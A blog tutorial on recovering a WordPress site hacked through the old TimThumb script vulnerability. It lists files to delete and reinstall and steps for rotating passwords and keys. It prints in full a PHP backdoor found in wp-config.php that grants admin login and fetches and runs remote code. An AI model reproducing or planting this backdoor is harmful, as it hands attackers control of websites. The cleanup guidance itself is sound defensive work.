How to Fix and Cleanup the TimThumb Hack in WordPress

So if you remember correctly, there was a security issue with the TimThumb script in August which was fixed. However still to our surprise, many sites are still using the old version. We have fixed three sites so far in the past month, one being yesterday. So it makes sense to simply write a step by step article, so our users can just follow it. All of the three users that we fix this issue for did not even know what TimThumb was or whether they were using it or not.

TimThumb is a PHP script that resizes images. There was a vulnerability in it, but it is SAFE to use now.

So how do you know that your site is hacked? If you see a big red screen on your browser when visiting to your site:

If you start getting bombarded with emails about users being redirected from your site. Most likely, the case is that your site was a victim of this exploit.

As a pro-cautionary measure, everyone should just use this Timthumb Vulnerability Scanner. This will tell you if you are using the older version of TimThumb. A lot of theme clubs upgraded their core right away. So this plugin will check if the new secure version of Timthumb is installed or an older version is installed.

Now if your site already fell prey to this Timthumb exploit, then here is what you need to do.

First you need to delete the following files:

/wp-admin/upd.php
/wp-content/upd.php

Log into WordPress admin panel and reinstall your WordPress version. We are specifically looking to reinstall these files:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

Then open your wp-config.php where you will most likely find this big malware code that is harvesting login credentials and cookies. This code will be towards the bottom.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

In your theme’s folder, look for anywhere the TimThumb script may be storing the cached files. Usually they are in this structure:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Delete everything that looks like this. If you are not sure about things, then delete everything that is not an image file.

Next thing you want to do is replace timthumb.php with the latest version which can be found at http://timthumb.googlecode.com/svn/trunk/timthumb.php

Now it would be a good idea to change your passwords starting with your MySQL login info to your WordPress login info. Don’t forget to change the password for MySQL in wp-config.php or you will get “Error Establishing Connection” screen.

Change the secret keys in your wp-config.php file. You can generate a new key by going to the online generator.

Now you are done. Don’t forget to empty all page caching plugins. As a cautionary measure, it is good to clear your browsers cache and cookies as well.

For developers, try using the Additional Image Sizes feature in WordPress to replace the Timthumb functionalities.

Let us know if you need further assistance by using our contact form.